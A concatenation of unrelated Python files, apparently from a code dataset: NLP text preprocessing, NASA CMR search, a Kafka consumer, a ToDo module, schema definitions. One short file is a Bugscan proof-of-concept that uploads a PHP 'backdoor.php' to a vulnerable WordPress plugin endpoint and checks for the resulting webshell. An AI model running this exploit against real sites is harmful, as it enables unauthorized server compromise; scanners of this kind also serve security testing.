bigram_dict = {}
with open(filename) as fin:
for line in fin:
data = json.loads(line)
bigram_dict[data["word"]] = data["score"]
return bigram_dict
def get_word_dict(word_count, top=10000, filter_regex=None):
if filter_regex:
word_count = {w: word_count[w] for w in word_count
if all([re.match(filter_regex, sw) for sw in w.split()])}
words = get_most_frequent(word_count, top=top)
return {v[1]: i for i, v in enumerate(words)}
def get_most_frequent(word_cnt, top=10000):
words = [(word_cnt[w], w) for w in word_cnt
if re.match("\w+", w)]
words.sort(reverse=True)
min_threshold = words[top - 1][0]
return [v for v in words if v[0] >= min_threshold]
| 2.84375 | 3 |
hidden.py | KangaroosInAntarcitica/TwitterMap | 0 | 12789270 | # Keep this file separate
# https://apps.twitter.com/
# Create new App and get the four strings
def oauth():
return {"consumer_key": "ejp9meWGxr5g1jH5qZozgvUwB",
"consumer_secret": "<KEY>",
"token_key": "<KEY>",
"token_secret": "<KEY>"}
| 2.421875 | 2 |
Bugscan_exploits-master/exp_list/exp-602.py | csadsl/poc_exp | 11 | 12789271 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'tyq'
# Name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
# Refer: https://www.bugscan.net/#!/x/21599
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
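    # Upload a PHP probe through the plugin's bundled jQuery-File-Upload endpoint,
    # then request the uploaded file and look for the md5("123") marker to confirm
    # that the shell upload succeeded.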
path = "/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php"
payload = arg + path
filename = "Content-Disposition: backdoor.php"
shell = "<?php echo md5(123)?>"
code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
code, head, res, _, _ = curl.curl(arg + uploadfile)
if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
security_hole("webshell url:%s" % (arg + uploadfile))
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
| 2.296875 | 2 |
examples/create_scripts/extensions/e-interval.py | bendichter/api-python | 32 | 12789272 | <gh_stars>10-100
# Definitions of extension to IntervalSeries
# "isc" is the schema id (or 'namespace')
# "fs" must always be the top level key
{"fs": {"isc": {
"info": {
"name": "Interval series code descriptions",
"version": "1.0",
"date": "April 7, 2016",
"author": "<NAME>",
"contact": "<EMAIL>",
"description": ("Extension to NWB Interval Series to include a code and "
"code_description dataset.")
},
"schema": {
"<IntervalSeries>/": {
"description": "Extension to IntervalSeries to include code descriptions.",
"codes": {
"description": "Codes that are used in the IntervalSeries",
"data_type": "int",
"dimensions": ["num_codes"] },
"code_descriptions": {
"description": "Description of each code",
"data_type": "text",
"dimensions": ["num_codes"] }}
}
}}}
| 1.164063 | 1 |
consumer_c.py | tobiaslory/Streaming-with-Kafka | 0 | 12789273 | <filename>consumer_c.py
from kafka import KafkaConsumer
if __name__ == '__main__':
kafka_consumer = KafkaConsumer('numbers')
for msg in kafka_consumer:
print(msg.key.decode("utf-8"), int.from_bytes(msg.value, byteorder='big')) | 2.6875 | 3 |
core/page/todo/todo.py | gangadhar-kadam/sapphite_lib | 0 | 12789274 | <reponame>gangadhar-kadam/sapphite_lib<filename>core/page/todo/todo.py
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd.
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.model.doc import Document
@webnotes.whitelist()
def get(arg=None):
"""get todo list"""
return webnotes.conn.sql("""select name, owner, description, date,
priority, checked, reference_type, reference_name, assigned_by
from `tabToDo` where (owner=%s or assigned_by=%s)
order by field(priority, 'High', 'Medium', 'Low') asc, date asc""",
(webnotes.session['user'], webnotes.session['user']), as_dict=1)
@webnotes.whitelist()
def edit(arg=None):
import markdown2
args = webnotes.form_dict
d = Document('ToDo', args.get('name') or None)
d.description = args['description']
d.date = args['date']
d.priority = args['priority']
d.checked = args.get('checked', 0)
if not d.owner: d.owner = webnotes.session['user']
d.save(not args.get('name') and 1 or 0)
if args.get('name') and d.checked:
notify_assignment(d)
return d.name
@webnotes.whitelist()
def delete(arg=None):
name = webnotes.form_dict['name']
d = Document('ToDo', name)
if d and d.name and d.owner != webnotes.session['user']:
notify_assignment(d)
webnotes.conn.sql("delete from `tabToDo` where name = %s", name)
def notify_assignment(d):
doc_type = d.reference_type
doc_name = d.reference_name
assigned_by = d.assigned_by
if doc_type and doc_name and assigned_by:
from webnotes.widgets.form import assign_to
assign_to.notify_assignment(assigned_by, d.owner, doc_type, doc_name)
| 2.125 | 2 |
podpac/datalib/nasaCMR.py | creare-com/podpac | 46 | 12789275 | """
Search using NASA CMR
"""
from __future__ import division, unicode_literals, print_function, absolute_import
import json
import logging
import requests
import numpy as np
_logger = logging.getLogger(__name__)
from podpac.core.utils import _get_from_url
CMR_URL = r"https://cmr.earthdata.nasa.gov/search/"
def get_collection_entries(session=None, short_name=None, keyword=None, **kwargs):
"""Uses NASA CMR to retrieve metadata about a collection
Parameters
-----------
    session: :class:`requests.Session`, optional
An authenticated Earthdata login session
short_name: str, optional
The short name of the dataset
keyword: str, optional
Any keyword search parameters
**kwargs: str, optional
Any additional query parameters
Returns
---------
list:
A list of collection metadata dictionaries
Examples:
-----------
>>> # This make the following request https://cmr.earthdata.nasa.gov/search/collections.json?short_name=SPL2SMAP_S
>>> get_collection_id(short_name='SPL2SMAP_S')
['C1522341104-NSIDC_ECS']
"""
base_url = CMR_URL + "collections.json?"
if short_name is not None:
kwargs["short_name"] = short_name
if keyword is not None:
kwargs["keyword"] = keyword
query_string = "&".join([k + "=" + v for k, v in kwargs.items()])
# use generic requests session if `session` is not defined
if session is None:
session = requests
pydict = _get_from_url(base_url + query_string, session).json()
entries = pydict["feed"]["entry"]
return entries
def get_collection_id(session=None, short_name=None, keyword=None, **kwargs):
"""Uses NASA CMR to retrieve collection id
Parameters
-----------
    session: :class:`requests.Session`, optional
An authenticated Earthdata login session
short_name: str, optional
The short name of the dataset
keyword: str, optional
Any keyword search parameters
**kwargs: str, optional
Any additional query parameters
Returns
---------
list
A list of collection id's (ideally only one)
Examples:
-----------
>>> # This make the following request https://cmr.earthdata.nasa.gov/search/collections.json?short_name=SPL2SMAP_S
>>> get_collection_id(short_name='SPL2SMAP_S')
['C1522341104-NSIDC_ECS']
"""
entries = get_collection_entries(session=session, short_name=short_name, keyword=keyword, **kwargs)
if len(entries) > 1:
_logger.warning("Found more than 1 entry for collection_id search")
collection_id = [e["id"] for e in entries]
return collection_id
def search_granule_json(session=None, entry_map=None, **kwargs):
"""Search for specific files from NASA CMR for a particular collection
Parameters
-----------
    session: :class:`requests.Session`, optional
An authenticated Earthdata login session
entry_map: function
A function applied to each individual entry. Could be used to filter out certain data in an entry
**kwargs: dict
Additional query string parameters.
At minimum the provider, provider_id, concept_id, collection_concept_id, short_name, version, or entry_title
need to be provided for a granule search.
Returns
---------
list
Entries for each granule in the collection based on the search terms
"""
base_url = CMR_URL + "granules.json?"
if not np.any(
[
            m in kwargs
for m in [
"provider",
"provider_id",
"concept_id",
"collection_concept_id",
"short_name",
"version",
"entry_title",
]
]
):
raise ValueError(
"Need to provide either"
" provider, provider_id, concept_id, collection_concept_id, short_name, version or entry_title"
" for granule search."
)
if "page_size" not in kwargs:
kwargs["page_size"] = "2000"
if entry_map is None:
entry_map = lambda x: x
query_string = "&".join([k + "=" + str(v) for k, v in kwargs.items()])
if session is None:
session = requests
url = base_url + query_string
if "page_num" not in kwargs:
entries = _get_all_granule_pages(session, url, entry_map)
else:
pydict = _get_from_url(url, session).json()
entries = list(map(entry_map, pydict["feed"]["entry"]))
return entries
def _get_all_granule_pages(session, url, entry_map, max_paging_depth=1000000):
"""Helper function for searching through all pages for a collection.
Parameters
-----------
    session: :class:`requests.Session`, optional
An authenticated Earthdata login session
url: str
URL to website
entry_map: function
Function for mapping the entries to a desired format
max_paging_depth
"""
page_size = int([q for q in url.split("?")[1].split("&") if "page_size" in q][0].split("=")[1])
max_pages = int(max_paging_depth / page_size)
pydict = _get_from_url(url, session).json()
entries = list(map(entry_map, pydict["feed"]["entry"]))
for i in range(1, max_pages):
page_url = url + "&page_num=%d" % (i + 1)
page_entries = _get_from_url(page_url, session).json()["feed"]["entry"]
if not page_entries:
break
entries.extend(list(map(entry_map, page_entries)))
return entries
| 3.0625 | 3 |
client/dvaclient/constants.py | ysglh/DeepVideoAnalytics | 3 | 12789276 | TYPE_QUERY_CONSTANT = 'Q'
TYPE_PROCESSING_CONSTANT = 'V'
| 1.03125 | 1 |
scripts/neo4j-delete_all.py | t-umeno/find_udp_server | 0 | 12789277 | <reponame>t-umeno/find_udp_server
#!/usr/bin/python
from neo4j.v1 import GraphDatabase, basic_auth
password = "<PASSWORD>"
driver = GraphDatabase.driver("bolt://localhost:7687", auth=basic_auth("neo4j", password))
session = driver.session()
result = session.run("MATCH (n) OPTIONAL MATCH (n)-[r]-() DELETE n,r")
session.close()
| 2.09375 | 2 |
Python/Topics/BeautifulSoup/Get the title/main.py | drtierney/hyperskill-problems | 5 | 12789278 | import requests
from bs4 import BeautifulSoup
url = input()
r = requests.get(url)
soup = BeautifulSoup(r.content, 'html.parser')
print(soup.find("h1").text)
| 3.28125 | 3 |
exercicios/ex036.py | LucasLima337/CEV_Python_Exercicios | 0 | 12789279 | <gh_stars>0
# Aprovando Empréstimo
import time
n = str(input('\033[1;30mDigite seu nome completo: ')).strip().title()
vc = float(input('Digite o valor da casa: R$'))
s = float(input('Digite o seu salário: R$'))
a = int(input('Digite por quantos anos irá pagar: '))
prest = vc / (a * 12)
print('')
print(f'Olá, {n.split()[0]} {n.split()[-1]}!\033[m')
print('')
time.sleep(0.75)
print('\033[1;30mANALISANDO...\033[m')
time.sleep(2)
print('')
print('\033[1;30m=-=\033[m' * 15)
if prest > ((30 / 100) * s):
from emoji import emojize
e = emojize(':x:', use_aliases=True)
print(f'\033[1;31mEMPRÉSTIMO NEGADO! {e}')
print('Prestação excedeu 30% do salário!')
print(f'PRESTAÇÃO: R${prest:.2f}/mês\033[m')
elif prest < ((30 / 100) * s):
from emoji import emojize
e = emojize(':heavy_check_mark:', use_aliases=True)
print(f'\033[1;32mEMPRÉSTIMO APROVADO! {e}\033[m')
print(f'\033[1;34mNome Completo: {n}')
print(f'Salário: R${s:.2f}')
print(f'Valor da Casa: R${vc:.2f}')
print(f'Anos de Pagamento: {a} anos.\033[m')
print(f'\033[1;32mPRESTAÇÃO: R${prest:.2f}/mês\033[m')
print('\033[1;30m=-=\033[m' * 15)
| 3.328125 | 3 |
scaladecore/__init__.py | guiloga/scaladecore | 0 | 12789280 | <gh_stars>0
from .managers import ContextManager
import os
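
# Decorator that wraps a function so that, when called, it receives a ContextManager
# initialized from the SCALADE_FI_TOKEN environment variable instead of its original
# arguments.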
def scalade_func(func):
def execute(*args, **kwargs):
SCALADE_FI_TOKEN = os.getenv('SCALADE_FI_TOKEN')
context = ContextManager.initialize_from_token(SCALADE_FI_TOKEN)
return func(context)
return execute
| 1.851563 | 2 |
process/pkg/src/song_lyrics/util.py | edublancas/song-lyrics | 6 | 12789281 | <reponame>edublancas/song-lyrics
import os
import yaml
from pkg_resources import resource_filename
def load_yaml_asset(path):
"""
Load a yaml located in the assets folder
by specifying a relative path to the assets/ folder
"""
relative_path = os.path.join('assets', path)
absolute_path = resource_filename('song_lyrics', relative_path)
with open(absolute_path) as f:
asset = yaml.load(f)
return asset
def load_logging_config_file():
content = load_yaml_asset('logging.yaml')
return content
| 3.0625 | 3 |
votakvot/resumable.py | allegro/votakvot | 2 | 12789282 | <gh_stars>1-10
from __future__ import annotations
import abc
import datetime
import time
from typing import Any, Dict, Optional, Union
import votakvot
class resumable_fn(abc.ABC):
snapshot_each: Optional[int] = None
snapshot_period: Union[datetime.timedelta, float, None] = None
def __init__(self, *args, **kwargs):
self.index = 0
self._args = args
self._kwargs = kwargs
self._state = 0
self._result = None
self._lsat = time.time()
def __iter__(self):
return self
def _prepare_snapshot_period(self):
if isinstance(self.snapshot_period, datetime.timedelta):
self.snapshot_period = self.snapshot_period.total_seconds()
def _need_snapshot(self):
return (
(self.snapshot_each and not self.index % self.snapshot_each)
or (self.snapshot_period and time.time() > self.snapshot_period + self._lsat)
)
@classmethod
def call(cls, *args, **kwargs):
return next(filter(None, cls(*args, **kwargs)))
def __getstate__(self):
return self.save_state()
def __setstate__(self, state):
self.load_state(state)
def __next__(self):
if self._state == 0: # begin
self.init(*self._args, **self._kwargs)
self._prepare_snapshot_period()
self._state = 1
self.snapshot()
elif self._state == 1: # loop
self.index += 1
if self.is_done():
self._result = self.result()
self._state = 3
self.cleanup()
self.snapshot()
else:
self.loop()
if not self.is_done() and self._need_snapshot():
self.snapshot()
elif self._state == 3: # return
self._state = 4
return self._result
else:
raise StopIteration
def snapshot(self):
votakvot.current_tracker().snapshot()
self._lsat = time.time()
@abc.abstractmethod
def init(self, *args, **kwargs) -> None:
raise NotImplementedError
@abc.abstractmethod
def loop(self) -> None:
raise NotImplementedError
@abc.abstractmethod
def is_done(self) -> bool:
raise NotImplementedError
def result(self) -> Any:
return None
def cleanup(self) -> None:
pass
def load_state(self, state: Dict):
self.__dict__.update(state)
def save_state(self) -> Dict:
return self.__dict__
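

# Illustrative sketch (not part of the original module): a minimal subclass that
# sums the integers 0..limit-1, snapshotting every 10 iterations.
#
# class sum_to(resumable_fn):
#     snapshot_each = 10
#
#     def init(self, limit):
#         self.limit = limit
#         self.total = 0
#
#     def loop(self):
#         self.total += self.index
#
#     def is_done(self):
#         return self.index >= self.limit
#
#     def result(self):
#         return self.total
#
# total = sum_to.call(100)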
| 2.34375 | 2 |
Inventationery/apps/PurchOrder/migrations/0006_auto_20151220_2213.py | alexharmenta/Inventationery | 0 | 12789283 | <filename>Inventationery/apps/PurchOrder/migrations/0006_auto_20151220_2213.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('PurchOrder', '0005_auto_20151220_2126'),
]
operations = [
migrations.AlterField(
model_name='purchordermodel',
name='PaymMode',
field=models.ForeignKey(blank=True, to='Payments.PaymModeModel', null=True),
),
migrations.AlterField(
model_name='purchordermodel',
name='Payment',
field=models.ForeignKey(blank=True, to='Payments.PaymentModel', null=True),
),
migrations.DeleteModel(
name='PaymentModel',
),
migrations.DeleteModel(
name='PaymModeModel',
),
]
| 1.382813 | 1 |
src/url_handlers.py | MarkHershey/paperbot | 0 | 12789284 | <reponame>MarkHershey/paperbot
# built-in modules
import re
from pathlib import Path
from typing import Dict, List, Tuple
# external modules
from markkk.logger import logger
__all__ = ["process_url"]
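
# process_url dispatches on the host found in the URL (arxiv.org, openaccess.thecvf.com,
# or openreview.net) and returns a dict with paper_id, paper_url, pdf_url and src_website.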
def process_url(url: str) -> Dict[str, str]:
if "arxiv.org" in url:
src_website = "arxiv"
paper_id, paper_url, pdf_url = process_arxiv_url(url)
elif "openaccess.thecvf.com" in url:
src_website = "cvf"
paper_id, paper_url, pdf_url = process_cvf_url(url)
elif "openreview.net" in url:
src_website = "openreview"
paper_id, paper_url, pdf_url = process_openreview_url(url)
else:
logger.error("URL not supported")
raise Exception("URL not supported")
tmp_paper_dict = {
"paper_id": paper_id,
"paper_url": paper_url,
"pdf_url": pdf_url,
"src_website": src_website,
}
return tmp_paper_dict
def process_arxiv_url(url: str) -> Tuple[str]:
def get_paper_id_from_url(url) -> str:
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
if url.endswith(".pdf"):
return url[:-4]
else:
return url
if "arxiv.org/abs" in url:
## abstract page
paper_id = get_paper_id_from_url(url)
paper_url = url
pdf_url = f"https://arxiv.org/pdf/{paper_id}.pdf"
return paper_id, paper_url, pdf_url
elif "arxiv.org/pdf" in url:
## pdf page
paper_id = get_paper_id_from_url(url)
paper_url = f"https://arxiv.org/abs/{paper_id}"
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by arxiv URL Handler.")
raise Exception("Unexpected URL Error by arxiv URL Handler.")
def process_cvf_url(url: str) -> Tuple[str]:
"""
Open Access url can be splitted into 5 parts:
start: 'https://openaccess.thecvf.com/'
context: 'content_CVPR_2020/'
pg_type: '/html/'
name: 'Wang_Dual_Super-Resolution_Learning_for_Semantic_Segmentation_CVPR_2020_paper'
end: '.html'
==> url = start + context + pg_type + name + end
"""
# url validation
if "openaccess.thecvf.com" not in url:
logger.error("Unexpected URL Error by CVF URL Handler.")
raise Exception("Unexpected URL Error by CVF URL Handler.")
def get_paper_id(url) -> str:
"""
Can parse either main url (paper_url) or pdf_url to find paper_id
paper_id in the form of: (context + name)
eg: "content_CVPR_2020/Wang_Dual_Super-Resolution_Learning_for_Semantic_Segmentation_CVPR_2020_paper"
"""
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
# stop after slash until "content_CVPR..."
flag = re.search("^content", url)
if flag != None:
break
if url.endswith(".html"):
paper_id = url.replace("/html", "").replace(".html", "")
return paper_id
else:
paper_id = url.replace("/papers", "").replace(".pdf", "")
return paper_id
def get_pg_from_paper_id(paper_id: str, parse_mode="abs") -> str:
start = "https://openaccess.thecvf.com/"
context, name = paper_id.split("/")
if parse_mode == "abs":
pg_type = "/html/"
end = ".html"
elif parse_mode == "pdf":
pg_type = "/papers/"
end = ".pdf"
else:
raise Exception("parse_mode error")
url = start + context + pg_type + name + end
return url
paper_id = get_paper_id(url)
if "/html" in url:
## abstract page
paper_url = url
pdf_url = get_pg_from_paper_id(paper_id, parse_mode="pdf")
return paper_id, paper_url, pdf_url
elif "/papers" in url:
## pdf page
paper_url = get_pg_from_paper_id(paper_id, parse_mode="abs")
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by CVF URL Handler.")
raise Exception("Unexpected URL Error by CVF URL Handler.")
def process_openreview_url(url: str) -> Tuple[str]:
"""
Open Review url can be splitted into 5 parts:
start: 'https://openreview.net/'
pg_type: 'forum' or 'pdf'
mid: '?id='
paper_id: 'nlAxjsniDzg'
==> url = start + pg_type + mid + paper_id
"""
# url validation
if "openreview.net" not in url:
logger.error("Unexpected URL Error by openreview URL Handler.")
raise Exception("Unexpected URL Error by openreview URL Handler.")
def get_paper_id(url) -> str:
while "/" in url:
slash_idx = url.find("/")
url = url[slash_idx + 1 :]
idx = url.find("=")
paper_id = url[idx + 1 :]
return paper_id
def get_pg_from_paper_id(paper_id: str, parse_mode="abs") -> str:
start = "https://openreview.net/"
mid = "?id="
if parse_mode == "abs":
pg_type = "forum"
elif parse_mode == "pdf":
pg_type = "pdf"
else:
raise Exception("parse_mode error")
url = start + pg_type + mid + paper_id
return url
paper_id = get_paper_id(url)
if "forum" in url:
## abstract page
paper_url = url
pdf_url = get_pg_from_paper_id(paper_id, parse_mode="pdf")
return paper_id, paper_url, pdf_url
elif "pdf" in url:
## pdf page
paper_url = get_pg_from_paper_id(paper_id, parse_mode="abs")
pdf_url = url
return paper_id, paper_url, pdf_url
else:
logger.error("Unexpected URL Error by openreview URL Handler.")
raise Exception("Unexpected URL Error by openreview URL Handler.")
if __name__ == "__main__":
from pprint import pprint
pprint(process_url("https://arxiv.org/abs/1301.3781"))
pprint(
process_url(
"https://openaccess.thecvf.com/content_CVPR_2020/papers/Kim_Advisable_Learning_for_Self-Driving_Vehicles_by_Internalizing_Observation-to-Action_Rules_CVPR_2020_paper.pdf"
)
)
pprint(process_url("https://openreview.net/forum?id=H1lj0nNFwB"))
| 2.359375 | 2 |
uitwerkingen/2-2darrays.py | harcel/PyDataScienceIntroNL | 0 | 12789285 | <filename>uitwerkingen/2-2darrays.py
import numpy as np

arr = np.random.randint(0, 10, size=(5,3))
print(arr)
arr_reshaped = arr.reshape((3,5))
print(arr_reshaped)
print()
print(arr.sum(axis=0))
print(arr_reshaped.sum(axis=1))  # These are not the same. The arrays are the same only if you read them from left to right, top to bottom.
print()
print(arr.transpose().sum(axis=1))  # With transpose this does work, because it mirrors the rows and columns.
| 3.484375 | 3 |
main.py | ShaunJorstad/Number-Puzzle-Solver | 0 | 12789286 | <reponame>ShaunJorstad/Number-Puzzle-Solver
from board import Board
import os
def prompt(validInput, promptTitle, default):
'''
    prompts the user with the provided options repeatedly until a valid value is selected, then returns it
'''
userInput = 'null'
while userInput not in validInput.keys():
print(f'{promptTitle}')
print(f'Select (default={default}): [', end='')
for (key, value) in validInput.items():
print(f'{key} ', end='')
print(']')
userInput = input(': ')
return userInput
def useCustomBoard():
    ''' prompts the user if they want to provide a custom board to solve or not'''
os.system('cls' if os.name == 'nt' else 'clear')
return '' != prompt({'yes': 'y', '': 'no'}, f'Solve custom board\n(main algorithm analytics are not run on custom boards)', 'no')
if __name__ == '__main__':
boardSize = 9
board = Board(heuristic=1)
board.shuffleValid()
if useCustomBoard():
board.customBuild()
board.playGame()
| 3.921875 | 4 |
fonctions.py | ImadEM21/win-one | 0 | 12789287 | <filename>fonctions.py
import re, string, unicodedata
import nltk
from bs4 import BeautifulSoup
from nltk import word_tokenize, sent_tokenize
from nltk.corpus import stopwords
from nltk.stem import LancasterStemmer, WordNetLemmatizer
from nltk.stem import PorterStemmer
from sklearn.feature_extraction.text import TfidfVectorizer,TfidfTransformer,CountVectorizer
from pathlib import Path
import pandas as pd
import gensim
import spacy
import numpy as np
from spacy import displacy
from nltk import word_tokenize
from nltk.tokenize import MWETokenizer
import joblib
import seaborn as sns
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics.pairwise import cosine_similarity
from nltk.stem.snowball import SnowballStemmer
from mongoengine import *
import datetime
import time
import matplotlib.pyplot as plt
import multiprocessing
import warnings
warnings.filterwarnings('ignore')
class Candidat(Document):
nom = StringField()
prenom = StringField()
dateNaissaice = DateField(input_formats= '%d-%m-%Y', required=False)
email = StringField()
numero = StringField()
age = StringField()
cv = ListField(FileField())
createdAt = DateTimeField(default = datetime.datetime.utcnow)
updatedAt = DateTimeField(default = datetime.datetime.utcnow)
class CandidatAnonyme(Document):
nomAnnonyme = StringField()
candidat = ReferenceField(Candidat)
class Competence(Document):
#nomCompetence = StringField()
#niveau = StringField()
candidat = ReferenceField(CandidatAnonyme)
competences = ListField(StringField())
sns.set_style("darkgrid")
snowBallStemmer = SnowballStemmer("french")
nlp = spacy.load("fr_core_news_md")
french_stopwords = nltk.corpus.stopwords.words('french')
newStopWords = ['quelque','quelques','trop','beaucoup','plus','dont','moins','faut','comme','leurs','peu','celle','celui','ci','cela','cette','ce','afin','comment','très','entre','aussi','si','tous','tout','toutes','toute','donc','alors','puisque','ici','vers', 'c47vr04052021 null', 'c64vr04052021 null',
'c82vr04052021 null']
french_stopwords.extend(newStopWords)
def remove_urls (data):
data = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', ' ', data, flags=re.MULTILINE)
return data
def remove_html(data):
return BeautifulSoup(data).get_text(separator=" ").strip()
def remove_quote(data):
return data.replace("'"," ")
def remove_special_quote(data):
return data.replace("’"," ")
def remove_back_quote(data):
return data.replace("`"," ")
def remove_multiple_space(data):
return ' '.join(data.split())
def remove_interrogation_reverse(data):
return data.replace("¿"," ")
def convert_lower_case(data):
return np.char.lower(data)
def remove_antislash(data):
symbols = ["\n", "\t", "\r"]
for i in range(len(symbols)):
data = data.replace(symbols[i]," ")
return data
def remove_accents(data):
data = ''.join((c for c in unicodedata.normalize('NFD', data) if unicodedata.category(c) != 'Mn'))
return data
def change_accents(data):
return unicodedata.normalize('NFKD', data).encode('ascii', 'ignore').decode('utf-8', 'ignore')
def remove_punctuation(data):
return re.sub(r'[^\w\s]', '', data)
def stemming(data):
stemmer = SnowballStemmer('french')
tokens = word_tokenize(str(data))
new_text = ""
for w in tokens:
new_text = new_text + " " + stemmer.stem(w)
return new_text
def remove_stop_words(data):
stop_words = stopwords.words('french')
words = word_tokenize(str(data))
new_text = ""
for w in words:
if w not in stop_words:
if len(w.strip()) > 2:
new_text = new_text + " " + w
return new_text
def remove_small_words(data):
words = word_tokenize(str(data))
new_text = ""
for w in words:
if len(w.strip()) > 2:
new_text = new_text + " " + w
return new_text
def preprocess(string_to_test):
string_to_test = str(remove_urls(string_to_test))
string_to_test = str(remove_html(string_to_test))
string_to_test = str(remove_antislash(string_to_test))
#string_to_test = str(remove_quote(string_to_test))
#string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_back_quote(string_to_test))
string_to_test = str(remove_interrogation_reverse(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
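# Illustrative sketch (not executed) of what preprocess() does to a raw posting;
# the input string is a made-up example:
#   raw = "Voir <b>notre offre</b> sur https://example.com \n ici"
#   preprocess(raw)  # -> roughly "Voir notre offre sur ici"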
def preprocess_entities(string_to_test):
string_to_test = str(remove_quote(string_to_test))
string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_punctuation(string_to_test))
string_to_test = str(remove_stop_words(string_to_test))
string_to_test = str(change_accents(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
def transform_entities(list_entities_1):
list_entities_copy=list_entities_1.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('s')):
temp_word=ent[:-1]
if (str(temp_word).split()[0].endswith('s')):
temp_word2 = str(ent).split()[0][:-1]+" "+str(ent).split()[1][:-1]
temp_word3 = str(ent).split()[0]+" "+str(ent).split()[1][:-1]
temp_word4 = str(ent).split()[0][:-1]+" "+str(ent).split()[1]
if(temp_word2 in list_entities_1):
list_entities_transforme.append(temp_word2)
elif(temp_word3 in list_entities_1):
list_entities_transforme.append(temp_word3)
elif(temp_word4 in list_entities_1):
list_entities_transforme.append(temp_word4)
else:
list_entities_transforme.append(ent)
else:
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
elif(ent.split()[0].endswith('s')):
temp_word = str(ent).split()[0][:-1]+" "+str(ent).split()[1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
return list_entities_transforme
def transform_entities_simple(list_entities_1):
list_entities_copy=list_entities_1.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('s')):
temp_word=ent[:-1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
list_entities_copy=list_entities_transforme.copy()
list_entities_transforme=[]
for ent in list_entities_copy:
if(ent.endswith('e')):
temp_word=ent[:-1]
if(temp_word in list_entities_1):
list_entities_transforme.append(temp_word)
else:
list_entities_transforme.append(ent)
else:
list_entities_transforme.append(ent)
return list_entities_transforme
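# Small illustrative example of the singular/plural folding above (the entity
# list is an assumption, not project data):
#   transform_entities_simple(["python", "pythons"])  # -> ["python", "python"]
# "pythons" collapses to "python" because the stripped form already exists in the list.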
def preprocess_verbs(string_to_test):
string_to_test = str(remove_quote(string_to_test))
string_to_test = str(remove_special_quote(string_to_test))
string_to_test = str(remove_punctuation(string_to_test))
string_to_test = str(remove_multiple_space(string_to_test))
return string_to_test
def transform_verbs(list_verbs_final_1,nlp):
list_verbs_copy=list_verbs_final_1.copy()
list_verbs_transforme=[]
for verb in list_verbs_copy:
if(verb.endswith('s')):
temp_word=verb[:-1]
if(temp_word in list_verbs_final_1):
list_verbs_transforme.append(temp_word)
else:
list_verbs_transforme.append(verb)
else:
list_verbs_transforme.append(verb)
list_verbs_copy=list_verbs_transforme.copy()
list_verbs_transforme=[]
for verb in list_verbs_copy:
if(verb.endswith('e')):
temp_word=verb[:-1]
if(temp_word in list_verbs_final_1):
list_verbs_transforme.append(change_accents(str(nlp(temp_word)[0].lemma_)))
else:
list_verbs_transforme.append(change_accents(str(nlp(verb)[0].lemma_)))
else:
list_verbs_transforme.append(change_accents(str(nlp(verb)[0].lemma_)))
return list_verbs_transforme
def tsnescatterplot(model, word, list_names, model_size):
""" Plot in seaborn the results from the t-SNE dimensionality reduction algorithm of the vectors of a query word,
its list of most similar words, and a list of words.
"""
if (model_size>300):
model_size=300
arrays = np.empty((0, model_size), dtype='f')
word_labels = [word]
color_list = ['red']
# adds the vector of the query word
arrays = np.append(arrays, model.wv.__getitem__([word]), axis=0)
# gets list of most similar words
close_words = model.wv.most_similar([word])
# adds the vector for each of the closest words to the array
for wrd_score in close_words:
wrd_vector = model.wv.__getitem__([wrd_score[0]])
word_labels.append(wrd_score[0])
color_list.append('blue')
arrays = np.append(arrays, wrd_vector, axis=0)
# adds the vector for each of the words from list_names to the array
for wrd in list_names:
wrd_vector = model.wv.__getitem__([wrd])
word_labels.append(wrd)
color_list.append('green')
arrays = np.append(arrays, wrd_vector, axis=0)
    # Reduce the dimensionality with PCA, keeping enough components to explain 90% of the variance
reduc = PCA(n_components=.9).fit_transform(arrays)
# Finds t-SNE coordinates for 2 dimensions
np.set_printoptions(suppress=True)
Y = TSNE(n_components=2, random_state=0, perplexity=15).fit_transform(reduc)
# Sets everything up to plot
df = pd.DataFrame({'x': [x for x in Y[:, 0]],
'y': [y for y in Y[:, 1]],
'words': word_labels,
'color': color_list})
fig, _ = plt.subplots()
fig.set_size_inches(9, 9)
# Basic plot
p1 = sns.regplot(data=df,
x="x",
y="y",
fit_reg=False,
marker="o",
scatter_kws={'s': 40,
'facecolors': df['color']
}
)
# Adds annotations one by one with a loop
for line in range(0, df.shape[0]):
p1.text(df["x"][line],
df['y'][line],
' ' + df["words"][line].title(),
horizontalalignment='left',
verticalalignment='bottom', size='medium',
color=df['color'][line],
weight='normal'
).set_size(15)
